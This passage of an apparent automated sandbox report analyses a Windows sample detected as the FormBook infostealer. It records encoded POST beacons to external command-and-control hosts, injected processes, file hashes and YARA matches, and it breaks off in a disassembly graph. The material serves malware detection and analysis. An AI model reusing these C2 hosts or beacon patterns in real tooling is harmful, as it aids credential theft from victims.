                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.optimallogics.services
                                                                                                                                  Origin: http://www.optimallogics.services
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.optimallogics.services/l7yl/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 68 53 43 67 65 6a 32 4d 63 37 35 34 2f 6f 48 68 70 54 39 73 52 31 42 79 74 32 7a 31 73 4b 4c 63 4d 56 58 6c 62 49 79 52 51 42 4f 66 5a 65 34 34 68 62 33 69 45 48 37 2f 53 33 36 54 39 6a 47 47 66 49 45 48 73 74 70 79 38 72 61 68 76 4b 62 38 2f 52 37 30 62 75 63 6c 41 45 36 55 39 73 56 36 79 6c 51 4e 51 73 71 48 36 64 6e 77 56 61 4d 31 4e 4c 31 71 63 39 36 59 56 64 32 66 72 6f 33 49 4a 37 4b 63 51 73 65 63 4b 66 35 67 2f 4e 39 51 37 4f 5a 46 67 7a 39 6b 70 53 64 34 42 72 2b 32 52 4e 4f 6c 6b 52 73 30 34 35 4a 68 6a 57 67 6d 71 34 77 4f 42 65 4e 33 77 34 41 71 47 4c 68 55 33 6b 4c 33 75 45 52 48 76 6d 44 74 70 54 2b 43 4a 64 68 46 6d 43 71 41 52 5a 2b 72 35 4e 61 37 31 6e 44 57 4e 4a 46 30 71 59 5a 59 62 78 72 57 6b 44 43 64 32 77 36 39 44 31 4b 5a 66 53 39 63 4c 46 64 72 62 54 42 32 36 6f 4a 55 50 6e 33 36 71 4b 75 6b 48 77 45 7a 76 59 74 6f 5a 42 72 78 78 64 56 52 6f 38 46 31 72 4d 41 6e 46 73 53 6a 48 66 64 70 51 57 43 35 4f 2f 45 58 65 76 64 76 6f 6d 57 76 34 41 62 62 79 [TRUNCATED]
                                                                                                                                  Data Ascii: NBfdCRyH=hSCgej2Mc754/oHhpT9sR1Byt2z1sKLcMVXlbIyRQBOfZe44hb3iEH7/S36T9jGGfIEHstpy8rahvKb8/R70buclAE6U9sV6ylQNQsqH6dnwVaM1NL1qc96YVd2fro3IJ7KcQsecKf5g/N9Q7OZFgz9kpSd4Br+2RNOlkRs045JhjWgmq4wOBeN3w4AqGLhU3kL3uERHvmDtpT+CJdhFmCqARZ+r5Na71nDWNJF0qYZYbxrWkDCd2w69D1KZfS9cLFdrbTB26oJUPn36qKukHwEzvYtoZBrxxdVRo8F1rMAnFsSjHfdpQWC5O/EXevdvomWv4AbbyadanDrXPkVbCKIMrFwHRIi3BnYWt6FwK++/R3+IWiDf2L7Zx71wnbSWHZajPjTvPSkFBHCoCjT9c0l8sYSoQ3a/kIs0tPyALfT9Q1fz6b7vGGI+PgQ5ZVNmyxShlcQK6SHsM9l/T0hKxPeowrnxP3c/ZFE/nD0TLla9hQ9U4lKVbo248sLUraiCGjRt6nudbHPw4zN93hV6JIONocQM0yOE5ltdV7nTBp2KWG/tMqCMofOQPPADxJhtBBsnDT0S8h4zrbp6pVj8tAPzolW+nejoRB/pXfqpP6KplQV9ow10pDvDtDmWM2Ef8rZ5C4KnqN45DW9bnACl4C7SlN+NhwzkbF7sFgcPpFMccWrgr9gFXuSVGCH0cqK8uASCMepf4yzKtg3pTw5Vntb8TUW4Zx57ERJ6yWVmulu1XpRVkWU6ul5gVdoS6I/H79N/qwZ6+bS6IyN0drXmzUUwMB9kHkLh/0Q8IlpMF0I+YCvQrxynGzsawIkabSXByEgPn55mcgy4DDGZyvhl6a07MKUp7FhrKPXHyNXg9CAJwxTbij1u3X7Y1U0KCYm4F4MSHsMwM5xqBqwrj5LObXFvByhHYdZbKZ2UX0UsV+rb6+KSO75Ql8Utb9YHg1UmP3BFxyWXb++G29DHedRbsy7Zxd15oPoG3PTlrkiavVl [TRUNCATED]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  48192.168.2.4500553.33.130.190804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:56:01.133799076 CET344OUTGET /l7yl/?NBfdCRyH=sQqAdTCbS5ZyyabbpAJZRll0pUbK84aDK2TkSI2WBXnBKfAm5rH7Pn2yJl6n6SmPfYwavNpLnreC9bzezBndAbo3NFWn8dwN0xctZM2wl8nSOv9OdJoKaOI=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.optimallogics.services
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:56:01.746458054 CET404INHTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 07 Nov 2024 11:56:01 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 264
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 42 66 64 43 52 79 48 3d 73 51 71 41 64 54 43 62 53 35 5a 79 79 61 62 62 70 41 4a 5a 52 6c 6c 30 70 55 62 4b 38 34 61 44 4b 32 54 6b 53 49 32 57 42 58 6e 42 4b 66 41 6d 35 72 48 37 50 6e 32 79 4a 6c 36 6e 36 53 6d 50 66 59 77 61 76 4e 70 4c 6e 72 65 43 39 62 7a 65 7a 42 6e 64 41 62 6f 33 4e 46 57 6e 38 64 77 4e 30 78 63 74 5a 4d 32 77 6c 38 6e 53 4f 76 39 4f 64 4a 6f 4b 61 4f 49 3d 26 5a 70 45 48 39 3d 54 6a 53 50 35 4c 58 58 62 4e 38 64 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NBfdCRyH=sQqAdTCbS5ZyyabbpAJZRll0pUbK84aDK2TkSI2WBXnBKfAm5rH7Pn2yJl6n6SmPfYwavNpLnreC9bzezBndAbo3NFWn8dwN0xctZM2wl8nSOv9OdJoKaOI=&ZpEH9=TjSP5LXXbN8d4"}</script></head></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  49192.168.2.450056104.21.64.124804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:56:06.857296944 CET609OUTPOST /ut59/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.gokulmohan.online
                                                                                                                                  Origin: http://www.gokulmohan.online
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.gokulmohan.online/ut59/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 2f 52 67 66 59 72 4d 55 46 36 45 61 6a 41 6f 45 66 37 61 42 63 7a 6c 7a 79 49 79 36 58 57 54 36 6b 38 76 63 39 35 63 51 30 49 76 63 6e 76 50 4e 7a 44 75 51 70 53 54 69 57 46 49 6a 72 6b 65 4f 33 51 70 68 30 30 76 4f 78 4a 33 42 62 72 63 68 6f 54 30 71 76 49 77 79 74 75 30 78 71 77 46 68 6e 46 44 44 64 56 4c 41 6d 61 6e 51 69 38 42 41 6f 6b 6b 4f 66 54 63 45 57 45 30 63 33 39 66 54 71 57 6f 37 70 6c 39 66 71 38 39 79 6a 69 43 78 63 78 2f 6a 62 75 50 50 61 75 78 32 54 51 62 46 4a 44 38 54 56 6c 44 75 36 6c 6b 70 32 50 52 4f 76 4f 36 78 4d 47 72 37 75 65 37 4d 6a 6f 4e 39 41 67 3d 3d
                                                                                                                                  Data Ascii: NBfdCRyH=/RgfYrMUF6EajAoEf7aBczlzyIy6XWT6k8vc95cQ0IvcnvPNzDuQpSTiWFIjrkeO3Qph00vOxJ3BbrchoT0qvIwytu0xqwFhnFDDdVLAmanQi8BAokkOfTcEWE0c39fTqWo7pl9fq89yjiCxcx/jbuPPaux2TQbFJD8TVlDu6lkp2PROvO6xMGr7ue7MjoN9Ag==
                                                                                                                                  Nov 7, 2024 12:56:08.000544071 CET1236INHTTP/1.1 403 Forbidden
                                                                                                                                  Date: Thu, 07 Nov 2024 11:56:07 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Referrer-Policy: same-origin
                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MGkzJSlWz5J7rARLMDU4NJmweb%2FGo0YWkHjb%2BTkMmVWpyn%2FPkYSmm2MfS6Fqzb7Jw6UQYb%2B77WNI6pNIfx9OS0obF9pQcbFOtGUufDztJE31qr%2BSrjzD7jqyZFaskXV7AywM7DSmUWk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8ded236219e7e91a-DFW
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=609&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                  Data Raw: 35 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd f6
                                                                                                                                  Data Ascii: 581Vmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?
                                                                                                                                  Nov 7, 2024 12:56:08.000736952 CET1145INData Raw: 02 2c a5 5a c1 2d e4 d6 49 74 d3 dc 12 d9 66 7e d8 de 80 b7 5a 49 38 90 52 0e e6 f5 61 7f da 74 8d aa aa 69 6e ac 6b 84 1e d2 1a 9c 93 a7 d8 ec b8 f8 56 98 c1 cf ab 2f 38 3f 9a 3d da 82 39 3a 3a 3a fe 61 c8 e8 7e a0 4c 69 19 dd 4e 2e e5 11 ff ed
                                                                                                                                  Data Ascii: ,Z-Itf~ZI8RatinkV/8?=9:::a~LiN.[tn,y6|4m^)6}k=eYlMR<@*_L`N54f9,0%pd\OgO~ak'o/`""+(z[G(,mQ`;#*SC!B


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                  50192.168.2.450057104.21.64.12480
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:56:09.843523026 CET629OUTPOST /ut59/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.gokulmohan.online
                                                                                                                                  Origin: http://www.gokulmohan.online
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.gokulmohan.online/ut59/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 2f 52 67 66 59 72 4d 55 46 36 45 61 35 6b 73 45 64 63 4f 42 64 54 6c 77 75 34 79 36 4d 47 54 32 6b 38 7a 63 39 38 6b 36 31 37 4c 63 6e 4e 58 4e 79 43 75 51 71 53 54 69 4f 31 49 73 76 6b 65 46 33 51 74 58 30 30 6a 4f 78 4a 6a 42 62 70 55 68 6f 67 4d 70 67 34 77 77 72 75 30 7a 6c 51 46 68 6e 46 44 44 64 55 71 64 6d 61 2f 51 69 73 78 41 70 42 49 4a 63 54 63 48 47 55 30 63 38 64 66 50 71 57 70 65 70 6b 68 31 71 2f 46 79 6a 6a 79 78 63 44 62 67 43 65 4f 6c 55 4f 77 2f 61 79 47 2f 50 32 5a 47 59 56 6a 37 34 55 45 4b 7a 4a 63 55 2b 2f 62 6d 65 47 50 49 7a 5a 79 34 75 72 77 30 62 71 6b 6e 32 39 31 75 65 33 34 2f 55 49 49 64 74 79 37 49 7a 70 55 3d
                                                                                                                                  Data Ascii: NBfdCRyH=/RgfYrMUF6Ea5ksEdcOBdTlwu4y6MGT2k8zc98k617LcnNXNyCuQqSTiO1IsvkeF3QtX00jOxJjBbpUhogMpg4wwru0zlQFhnFDDdUqdma/QisxApBIJcTcHGU0c8dfPqWpepkh1q/FyjjyxcDbgCeOlUOw/ayG/P2ZGYVj74UEKzJcU+/bmeGPIzZy4urw0bqkn291ue34/UIIdty7IzpU=
                                                                                                                                  Nov 7, 2024 12:56:10.947571039 CET1236INHTTP/1.1 403 Forbidden
                                                                                                                                  Date: Thu, 07 Nov 2024 11:56:10 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Referrer-Policy: same-origin
                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iqP8vLcSVEuO36QxxgDOsWNPw5LI%2Bg1jkahbvmWtM7Pt0ptLM51fVUjjwaWbDmaTjc3KnD1UEaktQEXcsNGwf7qdqieS59bAjOGSb2A0QIE3%2FfeHIw%2BA%2B6hJNVrUDH49jNdB3qpJTxo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8ded2374b8b28d26-DFW
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1375&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=629&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                  Data Raw: 35 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd f6 02 2c
                                                                                                                                  Data Ascii: 58cVmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?,
                                                                                                                                  Nov 7, 2024 12:56:10.947669029 CET212INData Raw: a5 5a c1 2d e4 d6 49 74 d3 dc 12 d9 66 7e d8 de 80 b7 5a 49 38 90 52 0e e6 f5 61 7f da 74 8d aa aa 69 6e ac 6b 84 1e d2 1a 9c 93 a7 d8 ec b8 f8 56 98 c1 cf ab 2f 38 3f 9a 3d da 82 39 3a 3a 3a fe 61 c8 e8 7e a0 4c 69 19 dd 4e 2e e5 11 ff ed 5b 74
                                                                                                                                  Data Ascii: Z-Itf~ZI8RatinkV/8?=9:::a~LiN.[tn,y6|4m^)6}k=eYlMR<@*_L`N54f9,0%pd\OgO~ak'o/`""+(z[
                                                                                                                                  Nov 7, 2024 12:56:10.947700024 CET926INData Raw: 47 28 93 2c 6d 97 a3 51 f4 fa 60 3b 10 0e c1 23 2a 53 01 d5 ca 43 83 de 8b 0a 21 c7 42 74 1e e3 a2 57 84 e0 f8 ea 39 f4 20 20 1c 57 58 7b ad 10 d6 35 1a f0 5d de 28 22 8e 52 5a d7 f8 04 ae d8 af 37 51 7e 70 96 bc 0d 1e 8b ce 29 da 80 43 e1 ad f1
                                                                                                                                  Data Ascii: G(,mQ`;#*SC!BtW9 WX{5]("RZ7Q~p)C h|<AGc>%$BijB:>y/(Y\cO(<9Evf7(@chpj'zH,jcVdOKmcvyZ0y%9odp


                                                                                                                                  Statistics

                                                                                                                                  CPU Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  Memory Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  High Level Behavior Distribution

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:06:52:00
                                                                                                                                  Start date:07/11/2024
                                                                                                                                  Path:C:\Users\user\Desktop\SDBARVe3d3.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\SDBARVe3d3.exe"
                                                                                                                                  Imagebase:0x940000
                                                                                                                                  File size:678'400 bytes
                                                                                                                                  MD5 hash:B6E0FB667376CCEBDDAF47C6D4432472
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:06:52:02
                                                                                                                                  Start date:07/11/2024
                                                                                                                                  Path:C:\Users\user\Desktop\SDBARVe3d3.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\SDBARVe3d3.exe"
                                                                                                                                  Imagebase:0xc50000
                                                                                                                                  File size:678'400 bytes
                                                                                                                                  MD5 hash:B6E0FB667376CCEBDDAF47C6D4432472
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2059073406.0000000003CB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2051531686.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:06:52:31
                                                                                                                                  Start date:07/11/2024
                                                                                                                                  Path:C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe"
                                                                                                                                  Imagebase:0x800000
                                                                                                                                  File size:140'800 bytes
                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4134736580.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  General

                                                                                                                                  Target ID:7
                                                                                                                                  Start time:06:52:32
                                                                                                                                  Start date:07/11/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\fc.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\SysWOW64\fc.exe"
                                                                                                                                  Imagebase:0x710000
                                                                                                                                  File size:22'528 bytes
                                                                                                                                  MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4134715840.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4134941283.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:false

                                                                                                                                  General

                                                                                                                                  Target ID:8
                                                                                                                                  Start time:06:52:46
                                                                                                                                  Start date:07/11/2024
                                                                                                                                  Path:C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe"
                                                                                                                                  Imagebase:0x800000
                                                                                                                                  File size:140'800 bytes
                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4136828393.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  General

                                                                                                                                  Target ID:9
                                                                                                                                  Start time:06:53:04
                                                                                                                                  Start date:07/11/2024
                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                  Imagebase:0x7ff6bf500000
                                                                                                                                  File size:676'768 bytes
                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Disassembly

                                                                                                                                  Reset < >

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:9.3%
                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:305
                                                                                                                                    Total number of Limit Nodes:17
                                                                                                                                    execution_graph 21727 7294f2a 21728 7294f30 21727->21728 21729 7294eef 21727->21729 21735 7295718 21728->21735 21756 72956f0 21728->21756 21777 72956e1 21728->21777 21798 729577e 21728->21798 21730 729517d 21736 7295732 21735->21736 21820 7295f6c 21736->21820 21825 7295bb7 21736->21825 21835 7295db2 21736->21835 21843 7295f12 21736->21843 21848 7295c30 21736->21848 21853 7295c51 21736->21853 21862 7296391 21736->21862 21867 729621e 21736->21867 21872 7295d3e 21736->21872 21877 7295d5d 21736->21877 21882 729613a 21736->21882 21891 7295eba 21736->21891 21899 729605b 21736->21899 21907 7295b06 21736->21907 21918 7295d65 21736->21918 21926 7295de0 21736->21926 21931 7295c81 21736->21931 21942 7295c0c 21736->21942 21737 729573a 21737->21730 21757 72956f5 21756->21757 21757->21730 21759 7295f6c 2 API calls 21757->21759 21760 7295c0c 4 API calls 21757->21760 21761 7295c81 6 API calls 21757->21761 21762 7295de0 2 API calls 21757->21762 21763 7295d65 4 API calls 21757->21763 21764 7295b06 6 API calls 21757->21764 21765 729605b 4 API calls 21757->21765 21766 7295eba 4 API calls 21757->21766 21767 729613a 4 API calls 21757->21767 21768 7295d5d 2 API calls 21757->21768 21769 7295d3e 2 API calls 21757->21769 21770 729621e 2 API calls 21757->21770 21771 7296391 2 API calls 21757->21771 21772 7295c51 4 API calls 21757->21772 21773 7295c30 2 API calls 21757->21773 21774 7295f12 2 API calls 21757->21774 21775 7295db2 4 API calls 21757->21775 21776 7295bb7 6 API calls 21757->21776 21758 729573a 21758->21730 21759->21758 21760->21758 21761->21758 21762->21758 21763->21758 21764->21758 21765->21758 21766->21758 21767->21758 21768->21758 21769->21758 21770->21758 21771->21758 21772->21758 21773->21758 21774->21758 21775->21758 21776->21758 21778 72956f0 21777->21778 21778->21730 21780 7295f6c 2 API calls 21778->21780 21781 7295c0c 4 API calls 21778->21781 21782 7295c81 6 API calls 21778->21782 21783 7295de0 2 API calls 21778->21783 21784 7295d65 4 API calls 21778->21784 21785 7295b06 6 API calls 21778->21785 21786 729605b 4 API calls 21778->21786 21787 7295eba 4 API calls 21778->21787 21788 729613a 4 API calls 21778->21788 21789 7295d5d 2 API calls 21778->21789 21790 7295d3e 2 API calls 21778->21790 21791 729621e 2 API calls 21778->21791 21792 7296391 2 API calls 21778->21792 21793 7295c51 4 API calls 21778->21793 21794 7295c30 2 API calls 21778->21794 21795 